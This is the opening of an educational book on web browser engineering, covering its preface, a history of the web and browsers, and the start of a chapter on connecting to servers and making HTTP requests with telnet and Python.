A computer science degree traditionally includes courses in operating systems, compilers, and databases in order to replace mystery with code. These courses transform Linux, Postgres, and LLVM into improvements, additions, and optimizations to an understandable core architecture. The lesson transcends the specific system studied: all computer systems, no matter how big and seemingly complex, can be studied and understoodOther reasons for these classes: a focus on speed; learning low-level APIs; practice with C; knowing the stack; using systems better; and the importance of the system covered..
But web browsers are still opaque, not just to students but to faculty and industry programmers. This book dissipates this mystery by systematically explaining all major components of a web browser.
Parts 1–3 of this book construct a basic browser weighing in around 1000 lines of code, twice that with the exercises. The average chapter takes 4–6 hours to read, implement, and debug for someone with a few years’ programming experience. Part 4 of this book covers advanced topics; those chapters are longer and have more code.
Your web browser will “work” every step of the way, and every chapter will build upon the last.This idea is from J.R. Wilcox, inspired in turn by S. Zdancewic’s course on compilers. That way, you will also practice growing and improving complex software. If you feel particularly interested in some component, please do flesh it out, complete the exercises, and add missing features. We’ve tried to arrange it so that this doesn’t make later chapters more difficult.
The code in this book uses Python
3, and we recommend you follow along in the same. When the book
shows Python command lines, it calls the Python binary
python3
.A
few operating systems use python
, but on most that means
Python 2. That said, the text avoids dependencies where
possible and you can try to follow along in another language. Make sure
your language has libraries for TLS connections (Python has one built
in), graphics (the text uses Tk), and JavaScript evaluation (the text
uses DukPy).
This book’s browser is irreverent toward standards: it handles only a sliver of the full HTML, CSS, and JavaScript languages, mishandles errors, and isn’t resilient to malicious inputs. It is also quite slow. Despite that, its architecture matches that of real browsers, providing insight into those 10 million line of code behemoths.
That said, we’ve tried to explicitly note when the book’s browser simplifies or diverges from standards. And in general, when you’re not sure how your browser should behave in some edge case, fire up your favorite web browser and try it out.
We’d like to recognize the countless people who built the web and the various web browsers. They are wonders of the modern world. Thank you! We learned a lot from the books and articles listed in this book’s bibliography—thank you to their authors. And we’re especially grateful to the many contributors to articles on Wikipedia (especially those on historic software, formats, and protocols). We are grateful for this amazing resource, one which in turn was made possible by the very thing this book is about.
Pavel: James R. Wilcox and I dreamed up this course during a late-night chat at ICFP 2018. Max Willsey proof-read and helped sequence the chapters. Zach Tatlock encouraged me to develop the book into a course. And the students of CS 6968 and CS 4962 at the University of Utah found countless errors and suggested important simplifications. I am thankful to all of them. Most of all, I am thankful to my wife Sara, who supported my writing the book, listened to countless status updates, and gave me the strength to finish this many-year-long project.
Chris: I am eternally grateful to my wife Sara for patiently listening to my endless musings about the web, and encouraging me to turn my idea for a browser book into reality. I am also grateful to Dan Gildea for providing feedback on my browser-book concept on multiple occasions. Finally, I’m grateful to Pavel for doing the hard work getting this project off the ground and allowing me to join the adventure. (Turns out Pavel and I had the same idea!)
This book is, and will remain, a work in progress. Please leave
comments and mark typos; the book has built-in feedback tools, which you
can enable with Ctrl-E
(or Cmd-E
on a Mac).
The full source code is also available on GitHub, though
we prefer to receive comments through the built-in tools.
Why study web browsers? The way I see it, browsers are fundamental to the web, to modern computing, and even to the economy broadly—so it’s worth knowing how they work. And in fact, cool algorithms, tricky data structures, and fundamental concepts come alive inside a web browser. This book walks you through building a browser, from scratch. I hope, as you read it, that you fall in love with web browsers, just like I did.
I—this is Chris speaking—have known the webBroadly defined, the web is the interlinked network (“web”) of web pages on the internet. If you’ve never made a web page, I recommend MDN’s Learn Web Development series, especially the Getting Started guide. This book will be easier to read if you’re familiar with the core technologies. for all of my adult life. Since I first encountered the web and its predecessors,For me, BBS systems over a dial-up modem connection. A BBS is not all that different from a browser if you think of it as a window into dynamic content created somewhere else on the internet. in the early 90s, I’ve been fascinated by browsers and the concept of networked user interfaces. When I surfed the web, even in its earliest form, I felt I was seeing the future of computing. In some ways, the web and I grew together—for example, in 1994, the year the web went commercial, was the same year I started college; while there I spent a fair amount of time surfing it, and by the time I graduated in 1999, the browser had fueled the famous dot-com speculation gold rush. The company for which I now work, Google, is a child of the web and was founded during that time. The web for me is something of a technological companion, and I’ve never been far from it in my studies or work.
In my freshman year at college, I attended a presentation by a RedHat salesman. The presentation was of course aimed at selling RedHat Linux, probably calling it the “operating system of the future” and speculating about the “year of the Linux desktop”. But when asked about challenges RedHat faced, the salesman mentioned not Linux but the web: he said that someone “needs to make a good browser for Linux.”Netscape Navigator was available for Linux at that time, but it wasn’t viewed as especially fast or featureful compared to its implementation on other operating systems. Even back then, in the very first year or so of the web, the browser was already a necessary component of every computer. He even threw out a challenge: “how hard could it be to build a better browser?” Indeed, how hard could it be? What makes it so hard? That question stuck with me for a long time.Meanwhile, the “better Linux browser than Netscape” took a long time to appear….
How hard indeed! After seven years in the trenches working on Chrome, I now know the answer to his question: building a browser is both easy and incredibly hard, both intentional and accidental. And everywhere you look, you see the evolution and history of the web wrapped up in one codebase. But most of all, it’s fun and endlessly interesting.
So that’s how I fell in love with web browsers. Now let me tell you why you will, too.
The web is a grand, crazy experiment. It’s natural, nowadays, to watch videos, read news, and connect with friends on the web. That can make the web seem simple and obvious, finished, already built. But the web is neither simple nor obvious. It is the result of experiments and research reaching back to nearly the beginning of computingAnd the web also needed rich computer displays, powerful UI-building libraries, fast networks, and sufficient CPU power and information storage capacity. As so often happens with technology, the web had many similar predecessors, but only took its modern form once all the pieces came together. about how to help people connect and learn from each other.
In the early days, the internet was a world wide network of computers, largely at universities, labs, and major corporations, linked by physical cables and communicating over application-specific protocols. The early web built on this foundation. Web pages were files in a specific format stored on specific computers, and web browsers used a custom protocol to request them. URLs for web pages named the computer and the file, and early servers did little besides read files from a disk. The logical structure of the web mirrored its physical structure.
A lot has changed. HTML is now usually dynamically assembled on the fly“Server-side rendering” is the process of assembling HTML on the server when loading a web page. Server-side rendering often uses web tech like JavaScript, and even a headless browser. Yet one more place browsers are taking over! and sent on demand to your browser. The pieces being assembled are themselves filled with dynamic content—news, inbox contents, and advertisements adjusted to your particular tastes. Even URLs no longer identify a specific computer—content distribution networks route a URL to any of thousands of computers all around the world. At a higher level, most web pages are served not from someone’s home computerPeople actually did this! And when their website became popular, it often ran out of bandwidth or computing power and became inaccessible. but from a social media platform or cloud computing service.
With all that’s changed, some things have stayed the same, the core building blocks that are the essence of the web:
As a philosophical matter, perhaps one or another of these principles is secondary. One could try to distinguish between the networking and rendering aspects of the web. One could abstract linking and networking from the particular choice of protocol and data format. One could ask whether the browser is necessary in theory, or argue that HTTP, URLs, and hyperlinking are the only truly essential parts of the web.
Perhaps.It is indeed true that one or more of the implementation choices could be replaced, and perhaps that will happen over time. For example, JavaScript might eventually be replaced by another language or technology, HTTP by some other protocol, or HTML by its successor. Certainly all of these technologies have been through many versions, but the web has stayed the web. The web is, after all, an experiment; the core technologies evolve and grow. But the web is not an accident; its original design reflects truths not just about computing, but about how human beings can connect and interact. The web not only survived but thrived during the virtualization of hosting and content, specifically due to the elegance and effectiveness of this original design.
The key thing to understand is this grand experiment is not over. The essence of the web will stay, but by studying web browsers you have the chance to contribute and to shape its future.
So let me tell you what it’s like to contribute. Some time during my
first few months of working on Chrome, I came across the code
implementing the <br>
tag—look at that, the good-old <br>
tag, which I’ve
used many times to insert newlines into web pages! And the
implementation turns out to be barely any code at all, both in Chrome
and in this book’s simple browser.
But Chrome as a whole—its features, speed, security, reliability—wow. Thousands of person-years went into it. There is a constant pressure to do more—to add more features, to improve performance, to keep up with the “web ecosystem”—for the thousands of businesses, millions of developers,I usually prefer “engineer”—hence the title of this book—but “developer” or “web developer” is much more common on the web. One important reason is that anyone can build a web page—not just trained software engineers and computer scientists. “Web developer” also is more inclusive of additional, critical roles like designers, authors, editors, and photographers. A web developer is anyone who makes web pages, regardless of how. and billions of users on the web.
Working on such a codebase can feel daunting. I often find lines of code last touched 15 years ago by someone I’ve never met; or even now discover files and code that I never knew existed; or see lines of code that don’t look necessary, yet seem to be important. How do I understand that 15-year-old code? Or learn the purpose of these new files? Can I delete those lines of code, or are they there for a reason?
Every browser has thousands of unfixed bugs, from the smallest of mistakes to myriad mix ups and mismatches. Every browser must be endlessly tuned and optimized to squeeze out that last bit of performance. Every browser requires painstaking work to continuously refactor the code to reduce its complexity, often through the carefulBrowsers are so performance-sensitive that, in many places, merely the introduction of an abstraction—the function call or branching overhead—has an unacceptable performance cost! introduction of modularization and abstraction.
What makes a browser different from most massive code bases is their urgency. Browsers are nearly as old as any “legacy” codebase, but are not legacy, not abandoned or half-deprecated, not slated for replacement. On the contrary, they are vital to the world’s economy. Browser engineers must therefore fix and improve rather than abandon and replace. And since the character of the web itself is highly decentralized, the use cases met by browsers are to a significant extent not determined by the companies “owning” or “controlling” a particular browser. Other people—you—can contribute ideas and proposals and implementations.
What’s amazing is that, despite the scale and the pace and the complexity, there is still plenty of room to contribute. Every browser today is open-source, which opens up its implementation to the whole community of web developers. Browsers evolve like giant R&D projects, where new ideas are constantly being proposed and tested out. As you would expect, some features fail and some succeed. The ones that succeed end up in specifications and are implemented by other browsers. That means that every web browser is open to contributions—whether fixing bugs or proposing new features or implementing promising optimizations.
And it’s worth contributing, because working on web browsers is a lot of fun.
HTML, CSS, HTTP, hyperlinks, and JavaScript—the core of the web—are approachable enough, and if you’ve made a web page before you’ve seen that programming ability is not required. That’s because HTML & CSS are meant to be black boxes—declarative APIs—where one specifies what outcome to achieve, and the browser itself is responsible for figuring out the how to achieve it. Web developers don’t, and mostly can’t, draw their web page’s pixels on their own.
As a black box, the browser is either magical or frustrating (depending on whether it is working correctly or not!). But that also makes a browser a pretty unusual piece of software, with unique challenges, interesting algorithms, and clever optimizations. Browsers are worth studying for the pure pleasure of it.
There are practical reasons for the unusual design of a browser. Yes, developers lose some control and agency—when pixels are wrong, developers cannot fix them directly.Loss of control is not necessarily specific to the web—much of computing these days relies on mountains of other peoples’ code. But they gain the ability to deploy content on the web without worrying about the details, to make that content instantly available on almost every computing device in existence, and to keep it accessible in the future, mostly avoiding the inevitable obsolescence of most software.
What makes that all work is the web browser’s implementations of inversion of control, constraint programming, and declarative programming. The web inverts control, with an intermediary—the browser—handling most of the rendering, and the web developer specifying parameters and content to this intermediary.For example, in HTML there are many built-in form control elements that take care of the various ways the user of a web page can provide input. The developer need only specify parameters such as button names, sizing, and look-and-feel, or JavaScript extension points to handle form submission to the server. The rest of the implementation is taken care of by the browser. Further, these parameters usually take the form of constraints over relative sizes and positions instead of specifying their values directly;Constraint programming is clearest during web page layout, where font and window sizes, desired positions and sizes, and the relative arrangement of widgets is rarely specified directly. A fun question to consider: what does the browser “optimize for” when computing a layout? the browser solves the constraints to find those values. The same idea applies for actions: web pages mostly require that actions take place without specifying when they do. This declarative style means that from the point of view of a developer, changes “apply immediately,” but under the hood, the browser can be lazy and delay applying the changes until they become externally visible, either due to subsequent API calls or because the page has to be displayed to the user.For example, when exactly does the browser compute which CSS styles apply to which HTML elements, after a web page changes those styles? The change is visible to all subsequent API calls, so in that sense it applies “immediately.” But it is better for the browser to delay style re-calculation, avoiding redundant work if styles change twice in quick succession. Maximally exploiting the opportunities afforded by declarative programming makes real-world browsers very complex.
To me, browsers are where algorithms come to life. A browser contains a rendering engine more complex and powerful than any computer game; a full networking stack; clever data structures and parallel programming techniques; a virtual machine, an interpreted language, and a JIT; a world-class security sandbox; and a uniquely dynamic system for storing data.
And the truth is—you use the browser all the time, maybe for reading this book! That makes the algorithms more approachable in a browser than almost anywhere else: the web is already familiar. After all, it’s at the center of modern computing.
Every year the web expands its reach to more and more of what we do with computers. It now goes far beyond its original use for document-based information sharing: many people now spend their entire day in a browser, not using a single other application! Moreover, desktop applications are now often built and delivered as web apps: web pages loaded by a browser but used like installed applications.Related to the notion of a web app is a Progressive Web App, which is a web app that becomes indistinguishable from a native app through progressive enhancement. Even on mobile devices, apps often embed a browser to render parts of the application UI.The fraction of such “hybrid” apps that are shown via a “web view” is likely increasing over time. In some markets like China, “super-apps” act like a mobile web browser for web-view-based games and widgets. Perhaps in the future both desktop and mobile devices will largely be a container for web apps. Already, browsers are a critical and indispensable part of computing.
So given this centrality, it’s worth knowing how the web works. And in fact, the web is built on simple concepts: open, decentralized, and safe computing; a declarative document model for describing UIs; hyperlinks; and the User Agent model.The User Agent concept views a computer, or software within the computer, as a trusted assistant and advocate of the human user. It’s the browser that makes these concepts real. The browser is the User Agent, but also the mediator of the web’s interactions and the enforcer of its rules. The browser is the implementer of the web: Its sandbox keeps web browsing safe; its algorithms implement the declarative document model; its UI navigates links. Web pages load fast and react smoothly only when the browser is hyper-efficient.
Such lofty goals! How does the browser deliver on them? It’s worth knowing. And the best way to understand that question is to build a web browser.
This book explains how to build a simple browser, one that can—despite its simplicity—display interesting-looking web pages and support many interesting behaviors.You might relate this to the history of the web and the idea of progressive enhancement. As you’ll see, it’s surprisingly easy, and it demonstrates all the core concepts you need to understand a real-world browser. You’ll see what is easy and what is hard; which algorithms are simple, and which are tricky; what makes a browser fast, and what makes it slow.
The intention is for you to build your own browser as you work through the early chapters. Once it is up and running, there are endless opportunities to improve performance or add features. Many of these exercises are features implemented in real browsers, and I encourage you to try them—adding features is one of the best parts of browser development!
The book then moves on to details and advanced features that flesh out the architecture of a real browser’s rendering engine, based on my experiences with Chrome. After finishing the book, you should be able to dig into the source code of Chromium, Gecko, or WebKit, and understand it without too much trouble.
I hope the book lets you appreciate a browser’s depth, complexity, and power. I hope the book passes along its beauty—its clever algorithms and data structures, its co-evolution with the culture and history of computing, its centrality in our world. But most of all, I hope the book lets you see in yourself someone building the browser of the future.
If you’ve read this far, hopefully you’re convinced that browsers are interesting and important to study. Now we’ll dig a bit into the web itself, where it came from, and how the web and browsers have evolved to date. This history is by no means exhaustive.For example, there is nothing much about SGML or other predecessors to HTML. (Except in this footnote!) Instead, it’ll focus on some key events and ideas that led to the web. These ideas and events will explain how exactly a thing such as the web came to be, as well as the motivations and goals of those who created it and its predecessors.
The earliest exploration of how computers might revolutionize information is a 1945 essay by Vannevar Bush entitled As We May Think. This essay envisioned a machine called a Memex that helps (think: User Agent) an individual human see and explore all the information in the world. It was described in terms of the microfilm screen technology of the time, but its purpose and concept has some clear similarities to the web as we know it today, even if the user interface and technology details differ.
The web is at its core organized around the Memex-like goal of representing and displaying information, providing a way for humans to effectively learn and explore. The collective knowledge and wisdom of the species long ago exceeded the capacity of a single mind, organization, library, country, culture, group or language. However, while we as humans cannot possibly know even a tiny fraction of what it is possible to know, we can use technology to learn more efficiently than before, and, in particular, to quickly access information we need to learn, remember or recall. Consider this imagined research session described by Vannevar Bush–one that is remarkably similar to how we sometimes use the web:
The owner of the memex, let us say, is interested in the origin and properties of the bow and arrow. […] He has dozens of possibly pertinent books and articles in his memex. First he runs through an encyclopedia, finds an interesting but sketchy article, leaves it projected. Next, in a history, he finds another pertinent item, and ties the two together. Thus he goes, building a trail of many items.
Computers, and the internet, allow us to process and store the information we want. But it is the web that helps us organize and find that information, that knowledge, making it useful.The Google search engine’s well-known mission statement to “organize the world’s information and make it universally accessible and useful” is almost exactly the same. This is not a coincidence—the search engine concept is inherently connected to the web, and was inspired by the web’s design and antecedents.
As We May Think highlighted two features of the memex: information record lookup, and associations between related records. In fact, the essay emphasizes the importance of the latter—we learn by making previously unknown connections between known things:
When data of any sort are placed in storage, they are filed alphabetically or numerically. […] The human mind does not work that way. It operates by association.
By “association”, Bush meant a trail of thought leading from one record to the next via a human-curated link. He imagined not just a universal library, but a universal way to record the results of what we learn. That is what the web can do today.
The concept of hypertext documents linked by hyperlinks was invented in 1964-65 by Project Xanadu, led by Ted Nelson.He was inspired by the long tradition of citation and criticism in academic and literary communities. The Project Xanadu research papers were heavily motivated by this use case. Hypertext is text that is marked up with hyperlinks to other text. A successor called the Hypertext Editing System was the first to introduce the back button, which all browsers now have. (Since the system just had text, the “button” was itself text.)
Hypertext is text that is marked up with hyperlinks to other text. Sounds familiar? A web page is hypertext, and links between web pages are hyperlinks. The format for writing web pages is HTML, which is short for HyperText Markup Language. The protocol for loading web pages is HTTP, which is short for HyperText Transport Protocol.
Independently of Project Xanadu, the first hyperlink system appeared
for scrolling within a single document; it was later generalized to
linking between multiple documents. And just like those original
systems, the web has linking within documents as well as between them.
For example, the url “http://example.com/doc.html#link” refers to a
document called “doc.html
”, specifically to the element
with the name “link
” within it. Clicking on a link to that
URL will load doc.html
and scroll to the link
element.
This work also formed and inspired one of the key parts of Douglas Engelbart’s mother of all demos, perhaps the most influential technology demonstration in the history of computing. That demo not only showcased the key concepts of the web, but also introduced the computer mouse and graphical user interface, both of which are of course central components of a browser UI.That demo went beyond even this! There are some parts of it that have not yet been realized in any computer system. I highly recommend watching the demo yourself.
There is of course a very direct connection between this research and the document-URL-hyperlink setup of the web, which built on the hypertext idea and applied it in practice. The HyperTIES system, for example, had highlighted hyperlinks and was used to develop the world’s first electronically published academic journal, the 1988 issue of the Communications of the ACM. Tim Berners-Lee cites that 1988 issue as inspiration for the World Wide Web,Nowadays the World Wide Web is called just “the web”, or “the web ecosystem”—ecosystem being another way to capture the same concept as “World Wide”. The original wording lives on in the “www” in many website domain names. in which he joined the link concept with the availability of the internet, thus realizing many of the original goals of all this work from previous decades.Just as the web itself is a realization of previous ambitions and dreams, today we strive to realize the vision laid out by the web. (No, it’s not done yet!)
The word “hyperlink” may have been coined in 1987, in connection with the HyperCard system on Apple computers. This system was also one of the first, or perhaps the first, to introduce the concept of augmenting hypertext with scripts that handle user events like clicks and perform actions that enhance the UI–just like JavaScript on a web page! It also had graphical UI elements, not just text, unlike most predecessors.
In 1989-1990, the first web browser (named “WorldWideWeb”) and web
server (named “httpd
”, for “HTTP Daemon” according to UNIX
naming conventions) were born, written by Tim Berners-Lee.
Interestingly, while that browser’s capabilities were in some ways
inferior to the browser you will implement in this book,No CSS! in other
ways they go beyond the capabilities available even in modern
browsers.For example,
the first browser included the concept of an index page meant for
searching within a site (vestiges of which exist today in the
“index.html” convention when a URL path ends in /”), and had a WYSIWYG
web page editor (the “contenteditable” HTML attribute and “html()”
method on DOM elements have similar semantic behavior, but built-in file
saving is gone). Today, the index is replaced with a search engine, and
web page editors as a concept are somewhat obsolete due to the highly
dynamic nature of today’s web page rendering. On December
20, 1990 the first web
page was created. The browser we will implement in this book is
easily able to render this web page, even today.Also, as you can see clearly,
that web page has not been updated in the meantime, and retains its
original aesthetics! In 1991, Berners-Lee advertised his
browser and the concept on the alt.hypertext
Usenet group.
Berners-Lee’s Brief History of the Web highlights a number of other key factors that led to the World Wide Web becoming the web we know today. One key factor was its decentralized nature, which he describes as arising from the academic culture of CERN, where he worked. The decentralized nature of the web is a key feature that distinguishes it from many systems that came before or after, and his explanation of it is worth quoting here (highlight is mine):
There was clearly a need for something like Enquire [ed: a predecessor web-like database system, also written by Berners-Lee] but accessible to everyone. I wanted it to scale so that if two people started to use it independently, and later started to work together, they could start linking together their information without making any other changes. This was the concept of the web.
This quote captures one of the key value propositions of the web. The web was successful for several reasons, but I believe it’s primarily the following three:
It provides a very low-friction way to publish information and applications. There is no gatekeeper to doing anything, and it’s easy for novices to make a simple web page and publish it.
Once bootstrapped, it builds quickly upon itself via network effects made possible by compatibility between sites and the power of the hyperlink to reinforce this compatibility. Hyperlinks drive traffic between sites, but also into the web from the outside, from sources such as email, social networking, and search engines.
It is outside the control of any one entity—and kept that way via standards organizations—and therefore not subject to problems of monopoly control or manipulation.
The first widely distributed browser may have been ViolaWWW; this browser also pioneered multiple interesting features such as applets and images. This browser was in turn the inspiration for NCSA Mosaic, which launched in 1993. One of the two original authors of Mosaic went on to co-found Netscape, which built Netscape Navigator, the first commercial browser,By commercial I mean built by a for-profit entity. Netscape’s early versions were also not free software—you had to buy them from a store. They cost about $50. which launched in 1994.
The era of the “first browser war” ensued: a competition between Netscape Navigator and Internet Explorer. There were also other browsers with smaller market shares; one notable example is Opera. The WebKit project began in 1999; Safari and Chromium-based browsers, such as Chrome and newer versions of Edge, descend from this codebase. Likewise, the Gecko rendering engine was originally developed by Netscape starting in 1997; the Firefox browser is descended from this codebase. During the first browser war, nearly all of the core features of this book’s simple browser were added, including CSS, DOM, and JavaScript.
The “second browser war”, which according to Wikipedia was 2004-2017,
was fought between a variety of browsers, in particular Internet
Explorer, Firefox, Safari and Chrome. Chrome split off its rendering
engine subsystem into its own code base called Blink in
2013. The second browser war saw the development of many features of the
modern web, including widespread use of AJAX requests, HTML5 features
like <canvas>
, and a huge explosion in third-party
JavaScript libraries and frameworks.
In parallel with these developments was another, equally important, one—the standardization of web APIs. In October 1994, the World Wide Web Consortium (W3C) was founded to provide oversight and standards for web features. Prior to this point, browsers would often introduce new HTML elements or APIs, and competing browsers would have to copy them. With a standards organization, those elements and APIs could subsequently be agreed upon and documented in specifications. (These days, an initial discussion, design and specification precedes any new feature.) Later on, the HTML specification ended up moving to a different standards body called the WHATWG, but CSS and other features are still standardized at the W3C. JavaScript is standardized at TC39 (“Technical Committee 39” at ECMA, yet another standards body). HTTP is standardized by the IETF. The point is that the standards process set up in the mid-nineties is still with us.
In the first years of the web, it was not so clear that browsers would remain standard and that one browser might not end up “winning” and becoming another proprietary software platform. There are multiple reasons this didn’t happen, among them the egalitarian ethos of the computing community and the presence and strength of the W3C. Another important reason was the networked nature of the web, and therefore the necessity for web developers to make sure their pages worked correctly in most or all of the browsers (otherwise they would lose customers), leading them to avoid proprietary extensions. On the contrary—browsers worked hard to carefully reproduce each other’s undocumented behaviors—even bugs—to make sure they continued supporting the whole web.
There never really was a point where any browser openly attempted to break away from the standard, despite fears that that might happen.Perhaps the closest the web came to fragmenting was with the late-90s introduction of features for DHTML—early versions of the Document Object Model you’ll learn about in this book. Netscape and Internet Explorer at first had incompatible implementations of these features, and it took years, development of a common specification, and significant pressure campaigns on the browsers before standardization was achieved. You can read about this story in much more depth here. Instead, intense competition for market share was channeled into very fast innovation and an ever-expanding set of APIs and capabilities for the web, which we nowadays refer to as the web platform, not just the “World Wide Web”. This recognizes the fact that the web is no longer a document viewing mechanism, but has evolved into a fully realized computing platform and ecosystem.There have even been operating systems built around the web! Examples include webOS, which powered some Palm smartphones, Firefox OS (that today lives on in KaiOS-based phones), and ChromeOS, which is a desktop operating system. All of these OSes are based on using the Web as the UI layer for all applications, with some JavaScript-exposed APIs on top for system integration.
Given the outcomes—multiple competing browsers and well-developed standards—it is in retrospect not that relevant which browser “won” or “lost” each of the browser “wars”. In both cases the web won and was preserved and enhanced for the future.
Another important and interesting outcome of the second browser war was that all mainstream browsers today (of which there are many more than threeExamples of Chromium-based browsers include Chrome, Edge, Opera (which switched to Chromium from the Presto engine in 2013), Samsung Internet, Yandex Browser, UC Browser and Brave. In addition, there are many “embedded” browsers, based on one or another of the three engines, for a wide variety of automobiles, phones, TVs and other electronic devices.) are based on three open-source web rendering / JavaScript engines: Chromium, Gecko and WebKit.The JavaScript engines are actually in different repositories (as are various other sub-components that we won’t get into here), and can and do get used outside the browser as JavaScript virtual machines. One important application is the use of v8 to power node.js. However, each of the three rendering engines does have a corresponding JavaScript implementation, so conflating the two is reasonable. Since Chromium and WebKit have a common ancestral codebase, while Gecko is an open-source descendant of Netscape, all three date back to the 1990s—almost to the beginning of the web.
This is not an accident, and in fact tells us something quite interesting about the most cost-effective way to implement a rendering engine based on a commodity set of platform APIs. For example, it’s common for a wide variety of independent developers (ones not paid by the company nominally controlling the browser) to contribute code and features. There are even companies and individuals that specialize in implementing these features! And every major browser being open source feeds back into the standards process, reinforcing the web’s decentralized nature.
In summary, the history went like this:
Basic research was performed into the ways to represent and explore information.
Once the technology became mature enough, the web proper was proposed and implemented.
The web became popular quite quickly, and many browsers appeared in order to capitalize on the web’s opportunity.
Standards organizations were introduced in order to negotiate between the browsers and avoid proprietary control.
Browsers continued to compete and evolve at a rapid pace; that pace has overall not slowed in the years since.
Browsers appeared on all devices and operating systems, including all desktop and mobile devices & OSes, as well as embedded devices such as televisions, watches and kiosks.
The web continued to grow in power and complexity, even going beyond the original conception of a web browser.
Eventually, all web rendering engines became open source, as a recognition of their being a shared effort larger than any single entity.
The web has come a long way! It’ll be interesting to see where it goes in the future.
But one thing seems clear: it isn’t done yet.
What comes next: Based on what you learned about how the web came about and took its current form, what trends do you predict for its future evolution? For example, do you think it’ll compete effectively against other non-web technologies and platforms?
What became of the original ideas? The way the web works in practice is significantly different than the memex; one key difference is that there is no built-in way for the user of the web to add links between pages or notate them. Why do you think this is? Can you think of other goals from the original work that remain unrealized?
A web browser displays information identified by a URL. And the first step is to use that URL to connect to and download that information from a server somewhere on the Internet.
Browsing the internet starts with a URL,“URL” stands for “Uniform Resource Locator”, meaning that it is a portable (uniform) way to identify web pages (resources) and also that it describes how to access those files (locator). a short string that identifies a particular web page that the browser should visit. A URL looks like this:
http://example.org/index.html
This URL has three parts: the scheme explains how to get the information; the host explains where to get it; and the path explains what information to get. There are also optional parts to the URL, like ports, queries, and fragments, which we’ll see later.
From a URL, the browser can start the process of downloading the web
page. The browser first asks the OS to put it in touch with the
server described by the host name. The OS then talks
to a DNS server which convertsOn some systems, you can run
dig +short example.org
to do this conversion
yourself. a host name like example.org
into a
destination IP address like 93.184.216.34
.Today there are two versions
of IP: IPv4 and IPv6. IPv6 addresses are a lot longer and are usually in
hex, but otherwise the differences don’t matter here. Then
the OS decides which hardware is best for communicating with that
destination IP address (say, wireless or wired) using what is called a
routing table, and then uses device drivers to send signals
over a wire or over the air.I’m skipping steps here. On wires you first have to wrap
communications in ethernet frames, on wireless you have to do even more.
I’m trying to be brief. Those signals are picked up and
transmitted by a series of routersOr a switch, or an access
point, there are a lot of possibilities, but eventually there is a
router. which each choose the best direction to send your
message so that it eventually gets to the destination.They may also record where the
message came from so they can forward the reply back, especially in the
case of NATs. When the message reaches the server, a
connection is created. Anyway, the point of this is that the browser
tells the OS, “Hey, put me in touch with example.org
”, and
it does.
On many systems, you can set up this kind of connection using the
telnet
program, like this:The “80” is the port,
discussed below.
telnet example.org 80
You might need to install telnet
; it is often disabled
by default. On Windows, go to Programs
and Features / Turn Windows features on or off in the Control panel;
you’ll need to reboot. When you run it, it’ll clear the screen instead
of printing something, but other than that works normally. On macOS, you
can use the nc -v
command as a replacement for
telnet
:
nc -v example.org 80
The output is a little different but it works in the same way. On
most Linux systems, you can install telnet
from the package
manager; plus, the nc
command is usually available from a
package called netcat
.
You’ll get output that looks like this:
Trying 93.184.216.34...
Connected to example.org.
Escape character is '^]'.
This means that the OS converted the host name
example.org
into the IP address 93.184.216.34
and was able to connect to it.The line about escape characters is just instructions on
using obscure telnet
features. You can now
talk to example.org
.
The syntax of URLs is defined in RFC 3987, which is pretty readable. Try to implement the full URL standard, including encodings for reserved characters.
Once it’s connected, the browser requests information from the server
by giving its path, the path being the part of a URL that comes
after the host name, like /index.html
. The request looks
like this; you should type it into telnet
:
GET /index.html HTTP/1.0 Host: example.org
Make sure to type a blank line after the Host
line.
Here, the word GET
means that the browser would like to
receive information,It
could say POST
if it intended to send information, plus
there are some other, more obscure options. then comes the
path, and finally there is the word HTTP/1.0
which tells
the host that the browser speaks version 1.0 of HTTP.Why not 1.1? You can use 1.1,
but then you need another header (Connection
) to handle a
feature called “keep-alive”. Using 1.0 avoids this
complexity. There are several versions of HTTP (0.9,
1.0, 1.1, and 2.0). The HTTP 1.1 standard adds a variety of useful
features, like keep-alive, but in the interest of simplicity our browser
won’t use them. We’re also not implementing HTTP 2.0; HTTP 2.0 is much
more complex than the 1.X series, and is intended for large and complex
web applications, which our browser can’t run anyway.
After the first line, each line contains a header, which has
a name (like Host
) and a value (like
example.org
). Different headers mean different things; the
Host
header, for example, tells the server who you think it
is.This is useful when
the same IP address corresponds to multiple host names and hosts
multiple websites (for example, example.com
and
example.org
). The Host
header tells the server
which of multiple websites you want. These websites basically require
the Host
header to function properly. Hosting multiple
domains on a single computer is very common. There are
lots of other headers one could send, but let’s stick to just
Host
for now.
Finally, after the headers comes a single blank line; that tells the
host that you are done with headers. So type a blank line into
telnet
(hit Enter twice after typing the two lines of
request above) and you should get a response from
example.org
.
The HTTP/1.0 standard is also known as RFC 1945. The HTTP/1.1
standard is RFC 2616,
so if you’re interested in Connection
and keep-alive, look
there.
The server’s response starts with this line:
HTTP/1.0 200 OK
That tells you that the host confirms that it, too, speaks
HTTP/1.0
, and that it found your request to be “OK” (which
has a numeric code of 200). You may be familiar with
404 Not Found
; that’s another numeric code and response, as
are 403 Forbidden
or 500 Server Error
. There
are lots of these codes,As any look at a flow chart
will show. and they have a pretty neat organization
scheme:The status text
like OK
can actually be anything and is just there for
humans, not for machines.
Note the genius of having two sets of error codes (400s and 500s), which tells you who is at fault, the server or the browser.More precisely, who the server thinks is at fault. You can find a full list of the different codes on Wikipedia, and new ones do get added here and there.
After the 200 OK
line, the server sends its own headers.
When I did this, I got these headers (but yours will differ):
Age: 545933
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Feb 2019 16:49:28 GMT
Etag: "1541025663+gzip+ident"
Expires: Mon, 04 Mar 2019 16:49:28 GMT
Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
Server: ECS (sec/96EC)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1270
Connection: close
There is a lot here, about the information you are
requesting (Content-Type
, Content-Length
, and
Last-Modified
), about the server (Server
,
X-Cache
), about how long the browser should cache this
information (Cache-Control
, Expires
,
Etag
), about all sorts of other stuff. Let’s move on for
now.
After the headers there is a blank line followed by a bunch of HTML code.
This is called the body of the server’s response, and your
browser knows that it is HTML because of the Content-Type
header, which says that it is text/html
. It’s this HTML
code that contains the content of the web page itself.
Let’s now switch gears from manual connections to Python.
Many common (and uncommon) HTTP headers are described on Wikipedia.
So far we’ve communicated with another computer using
telnet
. But it turns out that telnet
is quite
a simple program, and we can do the same programmatically. It’ll require
extracting host name and path from the URL, creating a socket,
sending a request, and receiving a response.In Python, there’s a library
called urllib.parse
for parsing URLs, but I think
implementing our own will be good for learning. Plus, it makes this book
less Python-specific.
Let’s start with parsing the URL. I’m going to make parsing a URL
return a URL
